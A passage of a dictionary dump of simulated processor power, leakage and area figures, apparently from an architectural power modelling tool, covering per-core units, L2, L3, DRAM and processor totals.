'Instruction Fetch Unit/Subthreshold Leakage': 0.932286, 'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843, 'L2/Area': 4.53318, 'L2/Gate Leakage': 0.015464, 'L2/Peak Dynamic': 0.0335487, 'L2/Runtime Dynamic': 0.00898508, 'L2/Subthreshold Leakage': 0.834142, 'L2/Subthreshold Leakage with power gating': 0.401066, 'Load Store Unit/Area': 8.80901, 'Load Store Unit/Data Cache/Area': 6.84535, 'Load Store Unit/Data Cache/Gate Leakage': 0.0279261, 'Load Store Unit/Data Cache/Peak Dynamic': 2.74287, 'Load Store Unit/Data Cache/Runtime Dynamic': 0.736603, 'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675, 'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085, 'Load Store Unit/Gate Leakage': 0.0350888, 'Load Store Unit/LoadQ/Area': 0.0836782, 'Load Store Unit/LoadQ/Gate Leakage': 0.00059896, 'Load Store Unit/LoadQ/Peak Dynamic': 0.0487145, 'Load Store Unit/LoadQ/Runtime Dynamic': 0.0487146, 'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961, 'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918, 'Load Store Unit/Peak Dynamic': 2.97291, 'Load Store Unit/Runtime Dynamic': 1.02556, 'Load Store Unit/StoreQ/Area': 0.322079, 'Load Store Unit/StoreQ/Gate Leakage': 0.00329971, 'Load Store Unit/StoreQ/Peak Dynamic': 0.120122, 'Load Store Unit/StoreQ/Runtime Dynamic': 0.240244, 'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621, 'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004, 'Load Store Unit/Subthreshold Leakage': 0.591321, 'Load Store Unit/Subthreshold Leakage with power gating': 0.283293, 'Memory Management Unit/Area': 0.4339, 'Memory Management Unit/Dtlb/Area': 0.0879726, 'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729, 'Memory Management Unit/Dtlb/Peak Dynamic': 0.0426316, 'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0429147, 'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699, 'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485, 'Memory Management Unit/Gate Leakage': 0.00808595, 'Memory Management Unit/Itlb/Area': 0.301552, 'Memory Management Unit/Itlb/Gate Leakage': 0.00393464, 'Memory Management Unit/Itlb/Peak Dynamic': 0.221153, 'Memory Management Unit/Itlb/Runtime Dynamic': 0.0298789, 'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758, 'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842, 'Memory Management Unit/Peak Dynamic': 0.450495, 'Memory Management Unit/Runtime Dynamic': 0.0727936, 'Memory Management Unit/Subthreshold Leakage': 0.0766103, 'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333, 'Peak Dynamic': 17.237, 'Renaming Unit/Area': 0.303608, 'Renaming Unit/FP Front End RAT/Area': 0.131045, 'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123, 'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468, 'Renaming Unit/FP Front End RAT/Runtime Dynamic': 9.80115e-06, 'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571, 'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885, 'Renaming Unit/Free List/Area': 0.0340654, 'Renaming Unit/Free List/Gate Leakage': 2.5481e-05, 'Renaming Unit/Free List/Peak Dynamic': 0.0306032, 'Renaming Unit/Free List/Runtime Dynamic': 0.00846019, 'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144, 'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064, 'Renaming Unit/Gate Leakage': 0.00708398, 'Renaming Unit/Int Front End RAT/Area': 0.0941223, 'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242, 'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965, 'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0963174, 'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488, 'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228, 'Renaming Unit/Peak Dynamic': 3.58947, 'Renaming Unit/Runtime Dynamic': 0.104787, 'Renaming Unit/Subthreshold Leakage': 0.0552466, 'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461, 'Runtime Dynamic': 3.30037, 'Subthreshold Leakage': 6.16288, 'Subthreshold Leakage with power gating': 2.55328}, {'Area': 32.0201, 'Execution Unit/Area': 7.68434, 'Execution Unit/Complex ALUs/Area': 0.235435, 'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646, 'Execution Unit/Complex ALUs/Peak Dynamic': 9.4469e-07, 'Execution Unit/Complex ALUs/Runtime Dynamic': 0.20269, 'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111, 'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163, 'Execution Unit/Floating Point Units/Area': 4.6585, 'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156, 'Execution Unit/Floating Point Units/Peak Dynamic': 2.02403e-05, 'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033, 'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829, 'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061, 'Execution Unit/Gate Leakage': 0.120359, 'Execution Unit/Instruction Scheduler/Area': 1.66526, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.187525, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519, 'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913, 'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223, 'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562, 'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763, 'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.302471, 'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755, 'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964, 'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262, 'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388, 'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608, 'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451, 'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.152677, 'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853, 'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446, 'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.642673, 'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892, 'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346, 'Execution Unit/Integer ALUs/Area': 0.47087, 'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291, 'Execution Unit/Integer ALUs/Peak Dynamic': 0.214472, 'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344, 'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222, 'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833, 'Execution Unit/Peak Dynamic': 4.2426, 'Execution Unit/Register Files/Area': 0.570804, 'Execution Unit/Register Files/Floating Point RF/Area': 0.208131, 'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788, 'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 3.82383e-06, 'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00786564, 'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698, 'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968, 'Execution Unit/Register Files/Gate Leakage': 0.000622708, 'Execution Unit/Register Files/Integer RF/Area': 0.362673, 'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992, 'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0568785, 'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0581712, 'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175, 'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675, 'Execution Unit/Register Files/Peak Dynamic': 0.0568823, 'Execution Unit/Register Files/Runtime Dynamic': 0.0660369, 'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387, 'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643, 'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912, 'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402, 'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.119827, 'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.321667, 'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478, 'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543, 'Execution Unit/Runtime Dynamic': 1.63844, 'Execution Unit/Subthreshold Leakage': 1.79543, 'Execution Unit/Subthreshold Leakage with power gating': 0.688821, 'Gate Leakage': 0.368936, 'Instruction Fetch Unit/Area': 5.85939, 'Instruction Fetch Unit/Branch Predictor/Area': 0.138516, 'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221, 'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362, 'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831, 'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00218632, 'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719, 'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236, 'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00218632, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00197119, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000799674, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045, 'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838, 'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732, 'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05, 'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602, 'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000835634, 'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505, 'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733, 'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00717947, 'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703, 'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282, 'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954, 'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758, 'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867, 'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0185717, 'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682, 'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357, 'Instruction Fetch Unit/Gate Leakage': 0.0589979, 'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323, 'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05, 'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827, 'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0559215, 'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885, 'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682, 'Instruction Fetch Unit/Instruction Cache/Area': 3.14635, 'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931, 'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 3.55709, 'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.178281, 'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022, 'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386, 'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799, 'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493, 'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404, 'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.189935, 'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943, 'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104, 'Instruction Fetch Unit/Peak Dynamic': 5.94824, 'Instruction Fetch Unit/Runtime Dynamic': 0.449888, 'Instruction Fetch Unit/Subthreshold Leakage': 0.932286, 'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843, 'L2/Area': 4.53318, 'L2/Gate Leakage': 0.015464, 'L2/Peak Dynamic': 0.0335487, 'L2/Runtime Dynamic': 0.00898409, 'L2/Subthreshold Leakage': 0.834142, 'L2/Subthreshold Leakage with power gating': 0.401066, 'Load Store Unit/Area': 8.80901, 'Load Store Unit/Data Cache/Area': 6.84535, 'Load Store Unit/Data Cache/Gate Leakage': 0.0279261, 'Load Store Unit/Data Cache/Peak Dynamic': 2.74294, 'Load Store Unit/Data Cache/Runtime Dynamic': 0.736636, 'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675, 'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085, 'Load Store Unit/Gate Leakage': 0.0350888, 'Load Store Unit/LoadQ/Area': 0.0836782, 'Load Store Unit/LoadQ/Gate Leakage': 0.00059896, 'Load Store Unit/LoadQ/Peak Dynamic': 0.048717, 'Load Store Unit/LoadQ/Runtime Dynamic': 0.048717, 'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961, 'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918, 'Load Store Unit/Peak Dynamic': 2.973, 'Load Store Unit/Runtime Dynamic': 1.02561, 'Load Store Unit/StoreQ/Area': 0.322079, 'Load Store Unit/StoreQ/Gate Leakage': 0.00329971, 'Load Store Unit/StoreQ/Peak Dynamic': 0.120128, 'Load Store Unit/StoreQ/Runtime Dynamic': 0.240255, 'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621, 'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004, 'Load Store Unit/Subthreshold Leakage': 0.591321, 'Load Store Unit/Subthreshold Leakage with power gating': 0.283293, 'Memory Management Unit/Area': 0.4339, 'Memory Management Unit/Dtlb/Area': 0.0879726, 'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729, 'Memory Management Unit/Dtlb/Peak Dynamic': 0.0426337, 'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0429167, 'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699, 'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485, 'Memory Management Unit/Gate Leakage': 0.00808595, 'Memory Management Unit/Itlb/Area': 0.301552, 'Memory Management Unit/Itlb/Gate Leakage': 0.00393464, 'Memory Management Unit/Itlb/Peak Dynamic': 0.221167, 'Memory Management Unit/Itlb/Runtime Dynamic': 0.0298807, 'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758, 'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842, 'Memory Management Unit/Peak Dynamic': 0.450513, 'Memory Management Unit/Runtime Dynamic': 0.0727974, 'Memory Management Unit/Subthreshold Leakage': 0.0766103, 'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333, 'Peak Dynamic': 17.2374, 'Renaming Unit/Area': 0.303608, 'Renaming Unit/FP Front End RAT/Area': 0.131045, 'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123, 'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468, 'Renaming Unit/FP Front End RAT/Runtime Dynamic': 9.80115e-06, 'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571, 'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885, 'Renaming Unit/Free List/Area': 0.0340654, 'Renaming Unit/Free List/Gate Leakage': 2.5481e-05, 'Renaming Unit/Free List/Peak Dynamic': 0.0306032, 'Renaming Unit/Free List/Runtime Dynamic': 0.00846073, 'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144, 'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064, 'Renaming Unit/Gate Leakage': 0.00708398, 'Renaming Unit/Int Front End RAT/Area': 0.0941223, 'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242, 'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965, 'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0963235, 'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488, 'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228, 'Renaming Unit/Peak Dynamic': 3.58947, 'Renaming Unit/Runtime Dynamic': 0.104794, 'Renaming Unit/Subthreshold Leakage': 0.0552466, 'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461, 'Runtime Dynamic': 3.30052, 'Subthreshold Leakage': 6.16288, 'Subthreshold Leakage with power gating': 2.55328}], 'DRAM': {'Area': 0, 'Gate Leakage': 0, 'Peak Dynamic': 0.22089883829319112, 'Runtime Dynamic': 0.22089883829319112, 'Subthreshold Leakage': 4.252, 'Subthreshold Leakage with power gating': 4.252}, 'L3': [{'Area': 61.9075, 'Gate Leakage': 0.0484137, 'Peak Dynamic': 0.10377, 'Runtime Dynamic': 0.0655018, 'Subthreshold Leakage': 6.80085, 'Subthreshold Leakage with power gating': 3.32364}], 'Processor': {'Area': 191.908, 'Gate Leakage': 1.53485, 'Peak Dynamic': 74.1984, 'Peak Power': 107.311, 'Runtime Dynamic': 14.9651, 'Subthreshold Leakage': 31.5774, 'Subthreshold Leakage with power gating': 13.9484, 'Total Cores/Area': 128.669, 'Total Cores/Gate Leakage': 1.4798, 'Total Cores/Peak Dynamic': 74.0946, 'Total Cores/Runtime Dynamic': 14.8996, 'Total Cores/Subthreshold Leakage': 24.7074, 'Total Cores/Subthreshold Leakage with power gating': 10.2429, 'Total L3s/Area': 61.9075, 'Total L3s/Gate Leakage': 0.0484137, 'Total L3s/Peak Dynamic': 0.10377, 'Total L3s/Runtime Dynamic': 0.0655018, 'Total L3s/Subthreshold Leakage': 6.80085, 'Total L3s/Subthreshold Leakage with power gating': 3.32364, 'Total Leakage': 33.1122, 'Total NoCs/Area': 1.33155, 'Total NoCs/Gate Leakage': 0.00662954, 'Total NoCs/Peak Dynamic': 0.0, 'Total NoCs/Runtime Dynamic': 0.0, 'Total NoCs/Subthreshold Leakage': 0.0691322, 'Total NoCs/Subthreshold Leakage with power gating': 0.0259246}}